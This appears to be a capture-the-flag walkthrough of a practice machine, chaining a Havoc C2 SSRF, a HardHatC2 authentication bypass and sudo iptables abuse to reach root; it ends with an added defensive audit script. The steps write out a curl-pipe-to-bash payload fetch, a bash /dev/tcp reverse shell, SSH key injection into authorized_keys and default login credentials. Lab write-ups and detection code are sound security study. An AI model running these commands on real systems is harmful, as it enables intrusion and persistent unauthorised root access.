Nmap Scan

A service-version and default-script scan (-sVC) of the target with Nmap:

     nmap -sVC -v3 backfire.htb

Discovered Ports:

  • 22/tcp - OpenSSH 9.2p1
  • 443/tcp - nginx 1.22.1 with self-signed certificate
  • 8000/tcp - nginx 1.22.1 serving directory listing

Initial Access

Reconnaissance

Browsing to http://backfire.htb:8000/ revealed two files:

  • disable_tls.patch
  • havoc.yaotl

disable_tls.patch shows that TLS has been disabled on the Havoc teamserver WebSocket listener (port 40056), leaving it exposed for potential exploitation.

Havoc C2 SSRF Exploit

Using a public exploit for Havoc C2:

Exploit: https://github.com/chebuya/Havoc-C2-SSRF-poc

Steps:

  1. Clone and set up the exploit:
     git clone https://github.com/chebuya/Havoc-C2-SSRF-poc.git
     cd Havoc-C2-SSRF-poc
  2. Modify the exploit.py script so its curl command fetches your payload:
     cmd = "curl http://<YOUR_KALI_IP>:8000/payload.sh | bash"
  3. Create a reverse shell payload:
     echo 'bash -i >& /dev/tcp/<YOUR_KALI_IP>/9002 0>&1' > payload.sh
  4. Serve the payload over HTTP:
     updog -p 8000
  5. Listen for the reverse shell:
     nc -lvnp 9002
  6. Run the exploit:
     python3 exploit.py --target https://backfire.htb -i 127.0.0.1 -p 40056
  7. Catch the reverse shell.

Persistence via SSH

To maintain access after getting a shell:

  1. Generate an SSH key pair (ed25519, so the public key lands in id_ed25519.pub):
     ssh-keygen -t ed25519
     cat ~/.ssh/id_ed25519.pub
  2. On the target, add the public key:
     echo "<YOUR_SSH_PUBLIC_KEY>" >> ~/.ssh/authorized_keys
  3. SSH in:
     ssh ilya@backfire.htb

Lateral Movement

A hint in hardhat.txt pointed to HardHatC2, for which a known authentication bypass and RCE chain exists.

Reference Exploit:
https://blog.sth.sh/hardhatc2-0-days-rce-authn-bypass-96ba683d9dd7

Steps:

  1. Port-forward the internal ports:
     ssh -L 5000:127.0.0.1:5000 ilya@backfire.htb
     ssh -L 7096:127.0.0.1:7096 ilya@backfire.htb
  2. Use exploit2.py to generate an admin JWT and create a new HardHatC2 user.
  3. Log in to HardHatC2 at https://127.0.0.1:5000/ using:
     Username: sth_pentest
     Password: sth_pentest
  4. Use the web interface to trigger a reverse shell.
  5. Stabilize access via SSH key injection, then SSH in as:
     ssh sergej@backfire.htb

Privilege Escalation

sudo Permissions:

     sudo -l

Output:

  • (root) NOPASSWD: /usr/sbin/iptables
  • (root) NOPASSWD: /usr/sbin/iptables-save

Using the technique from Shielder’s iptables LPE:

Reference:
https://www.shielder.com/blog/2024/09/a-journey-from-sudo-iptables-to-local-privilege-escalation/

Steps:

  1. Inject the SSH public key as an iptables rule comment (the surrounding newlines put the key on its own line when the rules are saved):
     sudo iptables -A INPUT -i lo -j ACCEPT -m comment --comment $'\n<YOUR_SSH_PUBLIC_KEY>\n'
  2. Write the rule set to root's authorized_keys with iptables-save:
     sudo iptables-save -f /root/.ssh/authorized_keys
  3. SSH in as root:
     ssh root@backfire.htb
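As an added defensive check, not part of the original writeup, the following Python script audits a host for the conditions this escalation relies on: NOPASSWD sudo rights on the iptables tools, and an authorized_keys file that carries iptables-save artefacts or a rule comment spanning several lines. The sudoers and authorized_keys samples are constructed, and the binary paths are an assumption for Debian-style layouts.

```python
import re

# Assumed install paths for the iptables tools named in the sudoers output above.
IPTABLES_BINS = ("/usr/sbin/iptables", "/usr/sbin/iptables-save",
                 "/sbin/iptables", "/sbin/iptables-save")
# Lines only iptables-save emits; their presence in an authorized_keys file
# means the file was (over)written via `iptables-save -f`.
SAVE_MARKERS = ("# Generated by iptables-save", "*filter", "*nat", "*mangle",
                ":INPUT ", ":FORWARD ", ":OUTPUT ", "COMMIT")
KEY_RE = re.compile(r"^(ssh-(rsa|ed25519|dss)|ecdsa-sha2-[\w-]+)\s+[A-Za-z0-9+/=]+")


def risky_sudo_entries(sudoers_text):
    """Return uncommented sudoers lines granting NOPASSWD use of iptables tools."""
    hits = []
    for line in sudoers_text.splitlines():
        s = line.strip()
        if s and not s.startswith("#") and "NOPASSWD" in s \
                and any(b in s for b in IPTABLES_BINS):
            hits.append(s)
    return hits


def multiline_comment_rules(save_output):
    """Return rules whose -m comment value runs across a line break.
    iptables-save writes comments verbatim, so an embedded newline becomes
    a line that other parsers (such as sshd's) read on its own."""
    hits, current = [], None
    for line in save_output.splitlines():
        if current is None:
            if '--comment "' in line and line.count('"') % 2 == 1:
                current = line          # opening quote with no closing quote
        else:
            current += "\n" + line
            if line.count('"') % 2 == 1:  # closing quote found
                hits.append(current)
                current = None
    return hits


def authorized_keys_findings(text):
    """Return (iptables-save marker lines, key lines sshd would still accept)."""
    lines = text.splitlines()
    markers = [ln for ln in lines if any(ln.startswith(m) for m in SAVE_MARKERS)]
    keys = [ln for ln in lines if KEY_RE.match(ln)]
    return markers, keys


# Constructed sample of /root/.ssh/authorized_keys after the technique above.
SAMPLE_AUTH_KEYS = """# Generated by iptables-save v1.8.9 on Mon Jan  1 00:00:00 2024
*filter
:INPUT ACCEPT [0:0]
-A INPUT -i lo -m comment --comment "
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDERKEYDATA attacker@example
" -j ACCEPT
COMMIT
"""
SAMPLE_SUDOERS = "sergej ALL=(root) NOPASSWD: /usr/sbin/iptables, /usr/sbin/iptables-save\n"
```

Run the three functions over /etc/sudoers (plus /etc/sudoers.d), the output of `iptables-save`, and each user's authorized_keys; any non-empty result from the first two, or markers from the third, deserves an alert.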

Summary

  • Initial Access: Exploit Havoc C2 SSRF to get reverse shell.
  • Lateral Movement: Exploit HardHatC2 authentication bypass.
  • Privilege Escalation: Abuse iptables with sudo to inject SSH key and escalate to root.

A successful chain of real-world vulnerabilities leading to complete system compromise.